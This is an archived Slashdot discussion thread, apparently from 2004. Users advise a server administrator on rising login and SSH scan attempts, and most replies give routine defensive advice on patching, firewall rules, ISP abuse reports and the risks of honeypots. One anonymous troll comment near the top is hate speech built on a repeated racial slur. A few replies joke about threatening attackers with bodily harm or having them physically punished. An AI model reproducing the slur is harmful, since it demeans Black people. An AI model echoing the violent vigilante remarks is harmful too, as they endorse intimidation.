
Dealing with Intruders?

Cliff posted about 10 years ago | from the outside-assistance-for-security-issues dept.

Security 656

drakyri asks: "I've been running a server for a small company for a few months. Recently, the number of attempted intrusions has jumped from about one every week to several per day - and these are only the really obvious attempts, like idiots who try to log in as root from the outside. The problem is that I'm not sure what to do about this. I've got their IP addresses and can usually tracert their ISP's - is there an accepted type of letter to send them without seeming like one of the corporate cease-and-desist gnomes?"


656 comments


Pisty (-1, Offtopic)

Anonymous Coward | about 10 years ago | (#9956398)

Yes

Easy (5, Insightful)

Anonymous Coward | about 10 years ago | (#9956402)

ignore them.

Unless they use a lot of bandwidth, that is the right decision to make.

Very Easy (5, Insightful)

kunjan1029 (447713) | about 10 years ago | (#9956421)

intrusion attempt >> /dev/null

ignore it. forget it. script kiddiz...

Re:Very Easy (5, Insightful)

TeVi (128093) | about 10 years ago | (#9956570)

(mod parent up!)

Yup, just make sure your box is secure.

Intrusion attempts happen unfortunately, with all the viruses, worms, etc. Just make sure your box won't get caught.

Re:Easy (4, Insightful)

Phil Karn (14620) | about 10 years ago | (#9956611)

Agreed. Just ignore them.

These things are far too common to get worked up about, and they still consume an infinitesimal fraction of my link capacity. I long ago stopped caring about unsuccessful intrusion attempts. I only care about the successful ones, and to help prevent those I apply all the usual safeguards.

NIGGERS LIKE NIGGER DICK (-1, Troll)

Anonymous Coward | about 10 years ago | (#9956403)

NIGGERS YOU'RE ALL NIGGERS

Re:NIGGERS LIKE NIGGER DICK (1)

terriblekarmanow tm (592883) | about 10 years ago | (#9956410)

NO YUO

Re:NIGGERS LIKE NIGGER DICK (-1, Troll)

Anonymous Coward | about 10 years ago | (#9956461)

Lamest GNAA troll ever!

just forget it (1, Funny)

Anonymous Coward | about 10 years ago | (#9956405)

ignorance is bliss!

Your firewall.... (2, Insightful)

paullush (767354) | about 10 years ago | (#9956406)

Add their IPs to your firewall for a start.

Re:Your firewall.... (5, Insightful)

arcade (16638) | about 10 years ago | (#9956490)

Why?

If they are just sending off SYN requests, then who cares? They'll get a few RST responses. Having your firewall bogged down by rules just to ignore some dialup user that'll probably have switched IPs the next day will just decrease others' chances of contacting you.

Secure your network. Have a nice firewall with okay rules, but there should be no need to add individual IPs to your ruleset all the time -- that just increases complexity and maintainability.

Re:Your firewall.... (1)

jhunsake (81920) | about 10 years ago | (#9956529)

Having your firewall bogged down by rules just to ignore some dialup user that'll probably have switched IPs the next day

Actually, most of the machines attacking me recently have been compromised static-ip servers at various hosting providers.

Re:Your firewall.... (2, Insightful)

jaavaaguru (261551) | about 10 years ago | (#9956584)

Name and shame! ;-)

Re:Your firewall.... (5, Insightful)

arcade (16638) | about 10 years ago | (#9956585)

Actually, most of the machines attacking me recently have been compromised static-ip servers at various hosting providers.

It depends on what kind of 'attack' we're talking about, of course. If it's just an automated attack which scans large ranges of IP-addresses for common vulnerabilities which you've patched against, there really isn't any need to add them to your firewall ruleset, unless they're pretty invasive.

By invasive I mean that they grope and poke, and grope and poke. If it's just a couple of packets - why care at all? You can always fire off an email to the hosting provider, but adding them to your firewall is just .. not necessary.

Take the recent increase in SSH scans for the 'test' and 'guest' accounts without password, or whatever it was one came into agreement that it was.. if you've got a patched SSH daemon, why care? Let them scan - and get rejected. Why bog down the firewall with hundreds, if not thousands, of extra matching rules?

If it's likely that you've got vulnerable machines on that port, block it entirely - or just allow it from specific IPs. Playing whack-a-mole against scanners is just a waste of time.

Patch the system, have a good general firewall ruleset that covers what needs to be covered - and let the scanners that aren't actually continuously filling your log files just scan on.

I've had to block _one_ abusive scanner during the last year. It was someone scanning for open http-proxies from Israel. They were hitting my machines several times per second, filling my apache logs with relay-attempts to mailservers. Which was quite frankly annoying.

Those scans were from four IP's within the same subnet, and their ISP didn't care. I got the ISP null routed due to their customers filling my logs (and my company doesn't do business in Israel at the moment, so it wasn't a loss anyways).

A few packets now and then on the other hand.. playing whack-a-mole with such is just a waste of time.

Re:Your firewall.... (1)

paullush (767354) | about 10 years ago | (#9956538)

Because some of the IPs will be static. Who said "Just SYN packets"??? If that, then they're OS detection as ... Why tolerate that?

Re:Your firewall.... (4, Interesting)

Anonymous Coward | about 10 years ago | (#9956501)

Yeah cause, there's no such thing as Dynamic IP addresses.

Better advice would be to only allow login connections (eg sshd) from known IP addresses.

Other measures depends on what services you are trying to secure, but make sure you've run through the http://www.cisecurity.com/ [cisecurity.com] lvl 1 benchmarks on an Internet connected machine (at the very least run the scoring tool).

Re:Your firewall.... (4, Insightful)

jhunsake (81920) | about 10 years ago | (#9956516)

Better yet, block everything and whitelist your shit.

Re:Your firewall.... (3, Insightful)

JPriest (547211) | about 10 years ago | (#9956541)

Exactly, why is he letting just anyone ssh into his boxes in the first place? Most of the services the company uses should be on private IP space inside of the firewall (NAT box), the rest of the devices on the outside need to be locked down good from Joe IP address.

DMCA (4, Funny)

Amiga Lover (708890) | about 10 years ago | (#9956408)

Use the DMCA to... I don't know, scare them or something. Mention RIAA and MPAA to their ISPs too.

Re:DMCA (4, Funny)

Anonymous Coward | about 10 years ago | (#9956507)

Tsk tsk, using the DMCA for something useful is unpatriotic.

Skript kiddiez (4, Funny)

robogun (466062) | about 10 years ago | (#9956411)

I haven't seen any similar increase in activity. Does your firm have enemies? For instance, does your first name rhyme with Carl?

Abuse@ (5, Informative)

craigske (106369) | about 10 years ago | (#9956413)

The accepted way is to send an email to abuse@ or to the abuse contact listed by ARIN for the netblock you are trying to lart.

http://www.arin.net
or lookup the RADB abuse contact
http://www.dnsstuff.org

don't forget logfiles & date/time (3, Informative)

Errtu76 (776778) | about 10 years ago | (#9956559)

Be sure though to include *all* relevant log files too. I've sent a couple of mails in the past to ISPs and I think I got a response from about 50% of the ISPs contacted, from which only one responded once by saying they contacted the individual and took appropriate actions ... whatever that may mean.

You'd be better off configuring your security better though.

Create a honeypot (4, Insightful)

JVert (578547) | about 10 years ago | (#9956415)

If you seem to be getting it from the same group of people make a honeypot but have some obvious hints once they get in, leave very little on the server and put the logs of their activity in an obvious place. Just be sure to isolate that machine from the rest of the network so if they do end up owning it they got no further then their failed attempt at your real machines.

Re:Create a honeypot (0)

Anonymous Coward | about 10 years ago | (#9956441)

The point being...?

Re:Create a honeypot (2, Interesting)

Anonymous Coward | about 10 years ago | (#9956444)

This probably would have to be the best option so far. Then you could also log how they cracked the machine (using another machine). This would let you secure your other machines as well.

(I've been told to say, "you're a fascist" so I did)

Re:Create a honeypot (0)

Anonymous Coward | about 10 years ago | (#9956460)

your suggestion is not valid.
it should read "no further THAN their failed attempt..."

Re:Create a honeypot (5, Interesting)

welshwaterloo (740554) | about 10 years ago | (#9956577)

IMHO - If you're not completely sure your network is 101% secure, or you don't have several free hours a day it would be a bad idea to drop a honeypot anywhere near your network.

Think about it - it's a slap in the face to the would-be hacker.. It's like you're leading him on, then saying "Ner Ner!" when he breaks into the pot.
If your hacker is serious, he's gonna be really pissed about this.

Secure your network & keep it secure - no need to stir 'em up.

Re:Create a honeypot (0)

Anonymous Coward | about 10 years ago | (#9956607)

Hey, a database record of just off credit card numbers might just take care of that real quick. Maybe be a REAL bitch, and make the first number and data real, but for a corporate card with a low per transaction and total limit. Or even contact customer service people for the people doing your corporate credit and see if they can come up with something even more wicked. But the number of people you could catch for $100 or so bucks a month might just be worth it to everyone involved. A serious hacker can be as pissed off as he wants when some 250 lb guy with 5% body fat is standing on his neck talking about how it's been months since he's seen sunlight and "such a pretty 'girl'" (facts which happen to be related).

Wow! A spike in hack attempts? (3, Insightful)

angryLNX (679691) | about 10 years ago | (#9956417)

Who'd have thought! [slashdot.org]

Re:Wow! A spike in hack attempts? (1)

MikeDX (560598) | about 10 years ago | (#9956505)

I think it could be something to do with the Gene therapy [slashdot.org] ! What's happened is a million of these "super-monkeys" are sitting at a million terminals, all trying to create the works of Shakespeare on port 23....

I tried to log in as root.. (5, Funny)

Anonymous Coward | about 10 years ago | (#9956418)

on my University's network more than once. I ran Linux and I got into the habit of logging in as root, and sometimes I'd try to log in without thinking just after starting a telnet session. I didn't receive any notice from the U, but in this post-9/11 hellmouth, I'm sure I'd have been reported to the FBI as a potential terrorist.

Re:I tried to log in as root.. (2, Insightful)

GodEater (7709) | about 10 years ago | (#9956553)

Let me get this straight - you "got used" to logging in as root? And to compound your folly, you used to do it over *TELNET* ?!?!?!

I think someone needs to read up a bit more on why both these things are bad ideas - and why doing them both at once is just internet suicide...

Re:I tried to log in as root.. (4, Insightful)

meringuoid (568297) | about 10 years ago | (#9956586)

I ran Linux and I got into the habit of logging in as root,

Unwise.

and sometimes I'd try to log in without thinking just after starting a telnet session.

Over telnet? Log in as root over telnet? AAAARRRGGGHHH!

Re:I tried to log in as root.. (0, Troll)

DanMc (623041) | about 10 years ago | (#9956588)

I accidentally log in as root all the time. I have to do 90% of my linux work as root (editing /etc files and stopping and starting daemons), so if I ssh or scp to an outside network, it uses my current user name by default: root. And even when I get a login: prompt, my natural instinct is to type root.

That said, I have seen an increase of root/guest/temp/ ssh login attempts on my home DSL router/firewall. The IPs tend to be similar to mine, and there are 7-10 attempts in a row. So I'm guessing there is a script or worm on the loose that searches nearby IPs for vulnerable hosts.

Re:I tried to log in as root.. (0)

Anonymous Coward | about 10 years ago | (#9956604)

> on my University's network more than once. I ran Linux and I got into the habit of
> logging in as root, and sometimes I'd try to log in without thinking just after
> starting a telnet session. I didn't receive any notice from the U, but in this
> post-9/11 hellmouth, I'm sure I'd have been reported to the FBI as a potential
> terrorist.

Only if you are of Arabic race or have an Arabic name.

Abuse (5, Insightful)

martingunnarsson (590268) | about 10 years ago | (#9956419)

When I had this problem I simply sent a mail to the ISP's abuse people. Most ISPs have an e-mail address like abuse@theisp.com. Then they can send the guy a warning or whatever.

Re:Abuse (1)

UltiSkeeter (663903) | about 10 years ago | (#9956479)

By and large, those times that I have sent stuff to 'abuse@whatever' with an event notice, I end up getting a spam flood. It's almost like I'm signing up for abuse! Very rarely have I got a reply that something was done...

Re:Abuse (1)

polished look 2 (662705) | about 10 years ago | (#9956515)

I recall someone behaving suspiciously on my webserver, so I found out who had the IP address where the activity was originating. A few days later I received a reply and they said they were very thankful for my contacting them, though I did not follow it up; I imagine it was a compromised server.

Why is this an abuse? (0)

Anonymous Coward | about 10 years ago | (#9956526)

It's like some kids trying some random lock combinations in a locker room.

This guy wants to take fingerprints, find the kids, and call their mom?

I say if you want to protect your bath towel with more than 4 numbers, then buy a lock with more than 4 numbers.

Re:Why is this an abuse? (1)

martingunnarsson (590268) | about 10 years ago | (#9956565)

The ISP I contacted took it pretty seriously, I think. I sent a couple of mails back and forth with the abuse-staff, and got a very good impression from them.

Re:Abuse (0)

Anonymous Coward | about 10 years ago | (#9956617)

At least in Germany, trying to log into someone else's root account without permission and other intrusion attempts are not illegal. Succeeding however is illegal (StGB 202a). You should be careful when wording abuse-complaints, or they could easily backfire (StGB 187), and in this case the attempt to get someone disconnected is enough.

huh? (-1, Flamebait)

Anonymous Coward | about 10 years ago | (#9956422)

you say "login as root" and then "tracert", are you a *nix man or a windows weenie? the quality of response you will get depends on the correct answer!

Letter (2, Funny)

Pinkfud (781828) | about 10 years ago | (#9956427)

Write in sloppy block letters: Ve know who you are. Do it vun more time und ve get NASTY!

Maybe set up a honeypot for a bit (5, Insightful)

Mal-2 (675116) | about 10 years ago | (#9956428)

If you give them a more attractive target for a while, you may find there really aren't all that many attackers left to go after the systems that matter. Not only that, but it would be considerably easier to set up such a system to log their attack techniques, since it isn't actually doing anything. Finally, if they do break through, who cares? Just re-image the drive and let them start over. If they manage to repeat it, you now have a known weakness you can correct.

Mal-2

Re:Maybe set up a honeypot for a bit (1)

meportez (695779) | about 10 years ago | (#9956497)

If they get through ONCE you've got a weakness to correct.

Re:Maybe set up a honeypot for a bit (1)

mstefanus (705346) | about 10 years ago | (#9956549)

Yes yes... that would be a good idea. Get Knoppix [knoppix.org] , run it on an old PC or something, route port 22 to that machine and enable ssh. Don't forget to set root password "root", you wouldn't want to make it too difficult, would you? ;-) Imagine the attacker's face, when he/she found out everything is on a CD! As for your real SSH, maybe you want to give portknocking [portknocking.org] a try.

Re:Maybe set up a honeypot for a bit (1)

kistral (757265) | about 10 years ago | (#9956576)

Reimage the drive? Excuse me? Isn't the whole point of a honeypot to study how they got in? For that matter, the first thing you do after any breach of security is shut everything down and don't change ANYTHING on the drive so you can pick up the pieces.

Re:Maybe set up a honeypot for a bit (2, Informative)

Anonymous Coward | about 10 years ago | (#9956625)

Honeypots should not be taken lightly. They are a legal hazard. You knowingly operate a vulnerable machine which is connected to the Internet. If the damage isn't restricted to your own systems, you're partially responsible and probably liable for other people's damages.

I agree (1, Informative)

Anonymous Coward | about 10 years ago | (#9956433)

I have also been seeing these kinds of "attacks" the last few weeks on a server which I admin. Usually attempts to login via ssh to well-known accounts (such as root).

The site is not a high-profile site by any means but rather a home for some personal projects. I just wrote it off as the script-kiddy attempt du jour but it's interesting to see that others experience the same thing.

ask your company lawyer (1, Informative)

Anonymous Coward | about 10 years ago | (#9956434)

you deal with the firewalls,
let your lawyers deal with crap like this

My Advice (3, Informative)

momogasuki (790667) | about 10 years ago | (#9956435)

Just ignore them. Focus on keeping your server software up to date and staying informed of possible security issues instead of wasting time trying to track down intrusion attempts.

Snort + Guardian (4, Informative)

UltiSkeeter (663903) | about 10 years ago | (#9956436)

These two will detect most automatic attempts and then add the IPs to a drop list on your Linux firewall. www.snort.org. Guardian is listed under 'other tools'.

Re:Snort + Guardian (2, Informative)

Anonymous Coward | about 10 years ago | (#9956623)

Automated addition to a firewall leads to a DOS vulnerability.

Not a cease-n-desist gnome... (5, Funny)

AngstAndGuitar (732149) | about 10 years ago | (#9956439)

You might consider sending a handwritten letter and use your own name, that would seem a bit more human. Also, most large companies will send polite-but-firm letters, so just threaten bodily harm to them and their pets, that should sound pretty un-corporate. I suppose only the first suggestion is really a good one, but I like the second one more, so I'm not going to remove it from my comment.

Re:Not a cease-n-desist gnome... (2, Funny)

raam (206445) | about 10 years ago | (#9956495)

Dear Blankety-blank:

Hi. I'm real, real sorry to take your time. I mean, if you don't have time, I understand, and, after all, I don't want to sound like a corporate gnome ]:-) :))). I know you're a real nice hacker, not one of those Russian mob nut-jobs...ah, oops, didn't mean to call names! Anyway, I was just wondering if, if it's not too much trouble, if you could not hack me. I understand that you are a person and have needs, but, and if this bothers you and I sound like a gnome, just let me know(! :) :O :>>), I was wondering if you would help a brother out. Thanks, and if this offends you in any way, please send it back to me and, as you can guess, I will certainly roll it up and put where any spineless dork might. Thank you so much. Thank you, thank you. You are too kind. Thank you.

Sincerely,

D.U. Fus, the Administrator
Tepid Water Suppositories, inc.

Re:Not a cease-n-desist gnome... (0)

Anonymous Coward | about 10 years ago | (#9956619)

Love it! Especially the smileys.

Corporate Gnome (2, Interesting)

Destructo-Bot (794990) | about 10 years ago | (#9956445)

If there are indeed blatant attempts to gain access to your network and server, then a simple letter or email to their ISP should do the trick and help show your boss that you were trying to be proactive. Keep in mind that those IP's could be spoofed however, so without something a little more substantial than an IP addy, you are likely to be ignored by most major isp's.

Best chance for a response is to keep it polite and request a notification of what action (if any) they will take. Don't fill your letter or email full of legalese and vague threats and I'm sure most of the people in charge of a particular abuse department will take you seriously enough. Whether or not they have the clout to take action on your behalf is another matter entirely however.

Another thing to do is to just keep yourself patched, firewalled, and a close eye on your network. If the attempts are rising, someone thinks your network/servers is/are an easy target. Prove them wrong and perhaps you won't need to write that letter after all.

Good luck.

Re:Corporate Gnome (2, Informative)

ssbljk (450611) | about 10 years ago | (#9956572)

Keep in mind that those IP's could be spoofed however, so without something a little more substantial than an IP addy, you are likely to be ignored by most major isp's.

well, if you decide to write to the ISP, don't write a letter in which you accuse them; ask the ISP for help to investigate, and be polite.

if you do, be careful what you assume (1)

jcomeau_ictx (696704) | about 10 years ago | (#9956449)

Remember that there are a lot of automated tools, worms, and virii that turn home computers into "zombie" boxes under remote control. If you do decide to send out anything, it's probably best to assume the apparent source of the problem may be masking the real source.

Re:if you do, be careful what you assume (1)

Jedi Alec (258881) | about 10 years ago | (#9956603)

all the more reason to send a mail. however, instead of blatantly accusing someone, just suggest that perhaps a not-so-friendly individual has gained access to that and that machine and is attempting to use it for illegal activities. if the box belongs to the person trying to do whatever is going on, that person might be tempted to go and look elsewhere, if it's a compromised box, well, maybe 1 unpatched windows user will find the time and effort to install a firewall...

Well... (5, Informative)

MrWorf (216691) | about 10 years ago | (#9956450)

I always write a really "nice" letter to the ISP of the intruder, where I explain the problem, and that it is causing my customers trouble and that it eats up valuable bandwidth. I ask them to take action, and if not, that I'll have to proceed further (never been needed once). I send the email from the admin account, sign it with my name + admin at my system and then I attach the logs pertaining to the intrusion attempt.

So far, all of these "cease and desist" letters have resulted in action on the ISPs' part, and in 50% of the cases, their admins write me back and give me feedback on the problem.

Of course, I don't do this for every attempt (all depending on my mood ... at least nowadays), mostly for the more serious attempts (doing multiple attempts, different attempts, etc).

The worst (or craziest?) attempt yet was by some nut who portscanned the system, port by port from start to finish. I actually managed to get hold of the owner of the computer system that was scanning me and phoned him. Quite a hilarious experience. Needless to say, the portscanning stopped :)

Re:Well... (4, Informative)

zoom (38906) | about 10 years ago | (#9956605)

I've had similar experiences. I've noticed several SSH attempts on my server recently - just a personal server at home. I've written to the abuse addresses found by running WHOIS and politely informed the ISP that there was an intrusion attempt and could they please inform the user that we are not a public service.
Many times the ISP has responded and usually their customer has a zombie box.
Always include a log if possible so they know the time and the IP-address. Remember to tell them what timezone the timestamps are from.
WHOIS links:
http://ws.arin.net/cgi-bin/whois.pl
http://www.ripe.net/db/whois/whois.html
http://www.apnic.net/apnic-bin/whois.pl

Politeness is key (1)

The Cyberwolfe (545759) | about 10 years ago | (#9956456)

If the attacks are just random script kiddies trying things that will never work, I'd probably ignore it.

If you're starting to see a pattern or an increase in the sophistication of the attack, though, you might want to just send their ISP a polite letter letting them know what you have found and your concerns. After all, what would you want to see if you were the ISP's sysadmin?

In my experience (3, Informative)

Howzer (580315) | about 10 years ago | (#9956459)

In my admittedly limited experience, having been a "web manager" for half a dozen websites or so in my time, this sort of stuff was seasonal (highs in summer and winter when the script kiddies were indoors) and never used to particularly bother me.

I had confidence in my setup, and no server I had control over was, to my knowledge, ever compromised.

We never had any sensitive data outside the firewall, anyway.

On two occasions it got serious (if an easily beaten DOS attack can be called serious) and even then it was only for 20 minutes or so. Our ISP (being a large telecom) was champing at the bit to go after people we had even a small scrap of evidence against, so on those two occasions we simply handed what information we'd gleaned to them, and they let out the dogs.

At some stage, you've got to stop worrying and learn how to love the internet!

Yes, there are several good ways. (5, Informative)

arcade (16638) | about 10 years ago | (#9956469)

Personally I tend to ignore the scans for ssh and so forth, as they're just SYN-packets and don't consume too much of my resources. Call me a lazy/non-caring bastard. However, it would surely be nice to send off a message to the ISP, as the machines the scans are originating from are probably cracked too.

I tend to report viruses. I grep my logs daily for viruses from various Norwegian ISPs, to the mailserver I admin for my company. During the last five months I've sent daily virus reports to the largest ISP in Norway, and they tend to reply within one business day - having notified their customer about the infection. If the customer gets several 'heads up' messages from the ISP without removing the virus, they get their port 25 access filtered until they've confirmed that they've removed the virus.

I tend to send emails such as this.

"
Hi there.

I've got several viruses from your customers today, and would appreciate it if you could notify your customers about the virus infections they probably have.

Here are the relevant snippets from my logs:

Virus: Netsky.B
Received: from at

Virus: Bagle.C
Received: from at

All timestamps on the server are NTP-sync'ed against .

Thanks for your time
"

Recently I've also included a more personalized

"Oh, and I have to commend your ISPs efficiency, as since march - you've managed to reduce the number of virus sending users to us from about per day, to this .. it's days since the last virus from you! Keep up the good work!"

You could probably just adapt what I'm writing to something saying that a customer of theirs probably has been cracked, and that they are currently scanning for .. and so forth.

If it's the actual cracker that's stupid enough to use his own computer, he'll get scared enough if they contact him telling him that his computers has been abused by others to scan people -- and will probably quit doing it. :)

Do what Mr Burns does... (5, Funny)

Anonymous Coward | about 10 years ago | (#9956472)

Nothing beats the personal touch of hired goons...

at some level you have to ignore it.... (5, Informative)

cbdavis (114685) | about 10 years ago | (#9956473)

or you'll spend half your time at work writing abuse letters. My logs at work show a constant barrage of windows attacks ( yes, code red is still there), 137 scans, numerous login hacks for any number of OS's, port scans that increment by 1 each time, etc. Sometimes it slows down. I am beginning to just consider it background noise. Just the cost of doing business on the web. As long as the probes aren't massive or working, I just note and ignore. I only have so much time for this - it keeps me from downloading all that porn!

Ignore it? (4, Informative)

Inominate (412637) | about 10 years ago | (#9956475)

This kind of stuff is all over the place. Odds are most of these are automated worms and similar crap. Unless it's really a concerted attack on your machines, as opposed to random scanning, it's not worth the effort to do anything about it except maybe firewall the IP.

Why not seem like a cease and desist gnome? (2, Insightful)

astrashe (7452) | about 10 years ago | (#9956476)

I don't understand why you'd care how you come off to the people trying to crack into your system.

They're out to do you harm. If one of them gets through and does some damage, you could lose your job.

abuse@.... (2, Insightful)

keithdowsett (260998) | about 10 years ago | (#9956480)

Hi,

As several posters have already stated you should complain to the abuse address for their ISP. Ideally, you should include logs of the attempt.

You should also be aware that the machines which are attempting to connect to your network are probably zombies. There are a number of trojans and security holes which can be exploited to allow a remote user to take over a poorly secured system. The owners probably don't even realise that their machines have been compromised.

I'm not sure there's much an ISP can do other than try to find out which customer had been assigned that IP address at the time and write to them. Banning someone for having poor security on their machine is probably a bit harsh, even in these post-9/11 times.

Keith.

I swear I won't do it again! (2, Funny)

teamhasnoi (554944) | about 10 years ago | (#9956485)

Just don't tell my mom! She'll take away my Compaq, or make me install SP2!

Secure your machine (0)

Anonymous Coward | about 10 years ago | (#9956486)

Welcome to life on the internet, now it's time to make sure your servers are secure. Turn off ALL services that are not required. Configure SSH to disallow root logins and passwords. From now on the only way into the servers should be by using SSH crypto keys.
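As an added example, not code from any commenter on this page: a small Python audit of sshd_config that flags the settings the comment above says to turn off, with a weak fragment beside a locked-down one. Both config fragments are constructed, and the defaults table assumes the OpenSSH releases of the thread's era.

```python
# Two constructed sshd_config fragments (assumed, not from the page): the kind
# of file that leaves root and password logins open, and the locked-down
# version the comment above describes (no root, no passwords, keys only).
WEAK_CONFIG = """\
Port 22
Protocol 2
PermitRootLogin yes
PasswordAuthentication yes
# Nothing restricts which accounts may log in
"""

HARDENED_CONFIG = """\
Port 22
Protocol 2
PermitRootLogin no
PasswordAuthentication no
ChallengeResponseAuthentication no
PubkeyAuthentication yes
AllowUsers alice bob
"""

# Values sshd uses when a keyword is absent. Assumed to match the OpenSSH
# releases of this thread's era; newer releases default PermitRootLogin to
# prohibit-password, so check your own `sshd -T` output rather than this table.
DEFAULTS = {
    "permitrootlogin": "yes",
    "passwordauthentication": "yes",
    "challengeresponseauthentication": "yes",
    "pubkeyauthentication": "yes",
}


def effective_settings(text):
    """Global settings as sshd reads them: the first occurrence of a keyword wins,
    keywords are case-insensitive, '#' starts a comment, and a Match block ends
    the global section (conditional overrides are out of scope here)."""
    found = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        if "=" in parts[0]:          # sshd also accepts "Key=Value"
            parts = line.split("=", 1)
        key = parts[0].strip().lower()
        if key == "match":
            break
        if len(parts) == 2 and key not in found:
            found[key] = parts[1].strip()
    settings = dict(DEFAULTS)
    settings.update(found)
    return settings


def audit_sshd_config(text):
    """Return the findings a defender would act on, one string per problem."""
    s = effective_settings(text)
    findings = []
    if s["permitrootlogin"] == "yes":
        findings.append("PermitRootLogin yes: root is a guessable, always-present account; set it to no")
    if s["passwordauthentication"] != "no":
        findings.append("PasswordAuthentication not disabled: the root/admin/guest guessing in the logs can succeed")
    # PAM keyboard-interactive is a second password path; newer sshd spells it KbdInteractiveAuthentication
    kbd = s.get("kbdinteractiveauthentication", s["challengeresponseauthentication"])
    if kbd != "no":
        findings.append("ChallengeResponseAuthentication not disabled: keyboard-interactive still accepts passwords")
    if s["pubkeyauthentication"] == "no":
        findings.append("PubkeyAuthentication no: with passwords off there would be no way in at all")
    if "allowusers" not in s and "allowgroups" not in s:
        findings.append("No AllowUsers/AllowGroups: every local account is a valid login target")
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"{name}: {len(audit_sshd_config(cfg))} finding(s)")
        for f in audit_sshd_config(cfg):
            print("  -", f)
```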

replace with secure systems - fast! (0)

Anonymous Coward | about 10 years ago | (#9956492)

I had an intrusion once - no wonder, really. The machine had an old SuSE install with all ports open, all services running: lpd, samba, X11, etc...

I didn't care much about it, it was just a small box and so I just sat back and watched the anomalous activity for about two weeks. But when the intruder installed a rootkit, I got nervous. Immediately removed the thing from the net and tried to figure out if they got access to the DB servers. Next day, the box was replaced by a hardened debian stable system, and we kept sure that only necessary stuff was on it and all the security patches installed.

We reported the incident to the police, but what can they really do? There were IPs from Bulgaria, Brazil and S. Korea exploiting the sshd at the same time....

We really learned our lesson there, and haven't had an intrusion since (well, except on that other old SuSE box...)

I've been noticing this too (1)

chesapeake (264414) | about 10 years ago | (#9956494)

FWIW, I'm a student running FC2 on a college LAN in Australia. In addition to the default install, I've whacked on a more complex firewall and also installed portsentry (mainly because IT services believes that running nessus with all of the options checked against the university LAN is a good idea).

In any case, just recently I've noticed far more attempts to log into SSHd. The number of port scans detected by portsentry is about the same as always - 2 to 5 a day. From yesterday's logwatch, for example, there were attempted logins as admin, guest, root, test and user. According to logwatch they're always tried with no password, then a password.

eg:

Illegal users from these:
admin/none from 203.227.204.32: 2 Time(s)
admin/password from 203.227.204.32: 2 Time(s)

I've definitely noticed a major increase in these attempts over the last while. Personally, it doesn't bother me - I just make sure that my passwords are up to date, and that remote root logins are disabled.

(Edited the snippet above for lameness filter)
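The logwatch excerpt above is a summary of sshd's syslog lines. The script below is an added example, not the commenter's setup: it reads the raw sshd lines (constructed here in OpenSSH's format, covering both the 2004-era "illegal user" wording and the later "invalid user" wording), rebuilds the same per-IP "user/method" table, and flags sources that cycle through the scanner's stock usernames, which is what separates a probe from a colleague mistyping a password.

```python
"""Summarise failed sshd logins the way the logwatch excerpt does, and
flag sources that cycle through the scanner's stock usernames.

Added example, not part of the original comment. The log lines are
constructed in OpenSSH's syslog format.
"""
import re
from collections import defaultdict

SAMPLE_AUTH_LOG = """\
Aug 12 03:14:07 web1 sshd[2201]: Illegal user admin from 203.0.113.32
Aug 12 03:14:07 web1 sshd[2201]: Failed none for illegal user admin from 203.0.113.32 port 4412 ssh2
Aug 12 03:14:09 web1 sshd[2201]: Failed password for illegal user admin from 203.0.113.32 port 4412 ssh2
Aug 12 03:14:12 web1 sshd[2203]: Failed password for illegal user guest from 203.0.113.32 port 4415 ssh2
Aug 12 03:14:15 web1 sshd[2205]: Failed password for root from 203.0.113.32 port 4418 ssh2
Aug 12 03:14:18 web1 sshd[2207]: Failed password for invalid user test from 203.0.113.32 port 4420 ssh2
Aug 12 09:02:41 web1 sshd[3100]: Failed password for alice from 198.51.100.7 port 51022 ssh2
Aug 12 09:02:50 web1 sshd[3100]: Accepted publickey for alice from 198.51.100.7 port 51022 ssh2
"""

# One regex covers "Failed none for illegal user X", "Failed password for
# invalid user X" and "Failed password for X" (an existing account).
FAILED_RE = re.compile(
    r"Failed (?P<method>\w+) for (?:(?:illegal|invalid) user )?"
    r"(?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+)"
)

# Usernames the mid-2004 scanner cycled through, per the comments above.
PROBE_NAMES = {"admin", "guest", "root", "test", "user"}


def parse_failures(log_text):
    """Return failures[ip][(user, method)] -> count of failed attempts."""
    failures = defaultdict(lambda: defaultdict(int))
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            failures[m["ip"]][(m["user"], m["method"])] += 1
    return failures


def suspicious_sources(failures, min_names=3):
    """IPs that tried at least min_names of the scanner's stock usernames.
    A real user mistyping a password hits one name, not a list."""
    return sorted(
        ip for ip, attempts in failures.items()
        if len({user for user, _ in attempts} & PROBE_NAMES) >= min_names
    )


def logwatch_summary(failures):
    """Render the per-IP table in logwatch's "Illegal users" style."""
    lines = ["Illegal users from these:"]
    for ip in sorted(failures):
        for (user, method), n in sorted(failures[ip].items()):
            lines.append(f"   {user}/{method} from {ip}: {n} Time(s)")
    return "\n".join(lines)


if __name__ == "__main__":
    failures = parse_failures(SAMPLE_AUTH_LOG)
    print(logwatch_summary(failures))
    for ip in suspicious_sources(failures):
        print(f"scanner-like source: {ip}")
```

The "none" method line is the no-password attempt the comment mentions; sshd logs it as a failure of the "none" authentication method before the client falls back to a password.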

Re:I've been noticing this too (1)

FyreFiend (81607) | about 10 years ago | (#9956533)

Yesterday was the first time in a long long time I've seen someone try to get into my computer. It was the same thing you saw. ssh connections trying to log in as admin, guest, test, and user. Only in my case it was from a host in .cn not .kr. I had thought of dropping an email to the admin of the netblock but it's been my experience that most admins in .cn just don't care.

Re:I've been noticing this too (1)

beakburke (550627) | about 10 years ago | (#9956545)

noticed the same thing here

And the problem is... (2, Funny)

Anonymous Coward | about 10 years ago | (#9956496)

...the attempted intrusion detection package.

It's wasting your time.
It makes you worry.
It makes you ask silly questions on slashdot.

The solution is to trash it, you don't need it, Linux is unbreakable anyway.

get an auto reporting tool (2, Informative)

Anonymous Coward | about 10 years ago | (#9956498)

try http://www.mynetwatchman.com/ works like a champ for me.

the system automatically sends a warning to the isp

Cinderella (1)

AftanGustur (7715) | about 10 years ago | (#9956500)

Well, after having been doing what you are doing for the last 10 years, I can only say "Welcome to the real world". The level of suspicious activity today is way above the level where you can handle it by complaining to the source ISP. Possibly he has a compromised server on his network, but most likely he doesn't care or doesn't have time to deal with complaints. Why should he anyway.. Scanning and probing isn't illegal in 99% of the world.

